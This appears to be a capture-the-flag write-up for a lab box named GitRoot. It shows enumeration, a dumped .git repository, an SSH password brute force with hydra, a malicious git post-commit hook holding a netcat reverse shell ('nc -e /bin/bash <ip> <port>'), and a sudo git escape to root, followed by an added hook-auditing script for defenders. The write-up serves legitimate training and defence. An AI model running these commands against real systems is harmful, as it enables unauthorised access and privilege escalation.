Git all the ways to the root!
We will learn about Git and how we should secure it to avoid privilege escalation :)
Enumeration
Let's run nmap first and see what we get.
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38
11211/tcp open memcache? syn-ack ttl 64
Port 80
We found a possible user, Jen, and a domain, wp.gitroot.vuln. Let's enumerate further to see whether any other virtual host can be found; we can use Gobuster for this. Please add the domain to /etc/hosts first.
gobuster vhost -u http://gitroot.vuln -w <wordlist>
wp.gitroot.vuln
Let's use wpscan, since there is a WordPress site here. We found another possible user, beth, but nothing more.
wpscan --url http://wp.gitroot.vuln -e u
repo.gitroot.vuln
There is a get.php used for fetching a file and a set.php for sending a file. I have tried both and nothing is working.
The next thing I can think of is to check whether there is a .git folder here, and we found it! So let's use Git Dumper.
python3 git-dumper.py http://repo.gitroot.vuln .
There are a lot of files in here, but nothing is working, except that we found another possible user, pablo. You can find a lot of information using git commands; please check my references :)
First User (Pablo)
I have tried all of the passwords, but none of them work. So let's use hydra with rockyou.txt (please customize it).
hydra -l pablo -P password.txt -f <ip> ssh
We found it!
Second User (Beth)
We found a message telling us to check the brand new git repo. So let's look for .git directories using find.
find / -name .git 2>/dev/null
We will take a look at /opt/auth/.git. Inside that directory, git branch shows that there are a lot of branches. So we can look at the log and see whether there is something important for us. Since there are a lot of repeated words, I use this command inside the log directory.
strings HEAD | grep -v 'init repo' | grep -v 'moving from'
We found that the value on the right side is the commit's unique id, or hash. We can take a look inside the commit using that hash.
git show 06fbefc1da56b8d552cfa299924097ba1213dd93
Since this .git directory is owned by beth, we can assume that the password is beth's, so let's move on!
Third User (Jen)
I tried putting a txt file inside Jen's repos and reading it, and it works. From here, let's take a look at GTFOBins, where we found something interesting that we can use.
Thanks to my friend @ch4rm aka Aniq Fakhrul, who found that we can use post-commit instead of pre-commit to get our shell!
# Create a git repo in the tmp directory
git init
# Create a post-commit hook (chmod 777 in case)
echo 'nc -e /bin/bash <ip> <port>' > '/tmp/.git/hooks/post-commit'
# Zip our .git directory
7z a shell.zip .git
# Copy our zip file to Jen's repos, where it will be unzipped and made public
cp shell.zip /home/jen/public/repos/shell.zip
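As an added defender-side example (not part of the original writeup or the box): the hook trick above works because Git runs any executable, non-.sample file in .git/hooks as the committing user, so an auditor wants to find every enabled hook and every hooks directory that other users can write to. The root path, the hook names and the sample layout built by build_demo_tree are assumptions for illustration.

```python
import os
import stat
import tempfile

# Client-side hooks Git runs automatically around commit, merge, push, checkout.
AUTO_HOOKS = {"pre-commit", "prepare-commit-msg", "commit-msg", "post-commit",
              "pre-push", "post-checkout", "post-merge", "pre-rebase"}
OTHERS_WRITE = stat.S_IWGRP | stat.S_IWOTH


def audit_git_hooks(root):
    """Report every enabled hook (executable, not *.sample) under any .git/hooks
    below `root`, noting whether someone other than the owner could write it."""
    findings = []
    for dirpath, dirnames, _ in os.walk(root):
        if os.path.basename(dirpath) != ".git":
            continue
        dirnames[:] = []  # nothing below .git (objects, refs, ...) needs walking
        hooks_dir = os.path.join(dirpath, "hooks")
        if not os.path.isdir(hooks_dir):
            continue
        dir_loose = bool(os.stat(hooks_dir).st_mode & OTHERS_WRITE)
        for name in sorted(os.listdir(hooks_dir)):
            path = os.path.join(hooks_dir, name)
            if name.endswith(".sample") or not os.path.isfile(path):
                continue
            mode = os.stat(path).st_mode
            if not mode & stat.S_IXUSR:
                continue  # not executable, so Git will never run it
            findings.append({"hook": path, "auto_trigger": name in AUTO_HOOKS,
                             "hook_writable_by_others": bool(mode & OTHERS_WRITE),
                             "hooks_dir_writable_by_others": dir_loose})
    return findings


def build_demo_tree(base=None):
    """Constructed sample layout (not a real target): one enabled post-commit
    hook, one non-executable pre-commit and one untouched .sample template."""
    base = base or tempfile.mkdtemp()
    hooks = os.path.join(base, "repo", ".git", "hooks")
    os.makedirs(hooks)
    for name, mode in (("post-commit", 0o755), ("pre-commit", 0o644),
                       ("pre-push.sample", 0o755)):
        with open(os.path.join(hooks, name), "w") as f:
            f.write("#!/bin/sh\necho hook ran\n")
        os.chmod(os.path.join(hooks, name), mode)
    os.chmod(hooks, 0o777)  # deliberately loose, like an unzipped upload
    return base


if __name__ == "__main__":
    print(audit_git_hooks(build_demo_tree()))
```

Run it against a real home or web root and any finding with auto_trigger set and a writable hooks directory is exactly the condition the writeup abuses.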
Root
The first thing I did after getting the Jen user was to check the home directory. I found a suspicious word inside .viminfo.
I tried to use it for root, but that got nowhere; after a lot of trying, it turned out to actually be Jen's password haha. After that we can use sudo -l to check which commands this user can run.
Yess! We can use GTFOBins for this one and it's very simple :)
sudo git help config
# Enter this
!/bin/sh
This box sure is interesting. I learned a lot about git commands, and there are many more to learn. Thanks to my friend @ch4rm aka Aniq Fakhrul, and please check his website in the references!
If you have any suggestions, or there is something I can improve, please do tell me. I hope this writeup helps someone, and let's learn together :)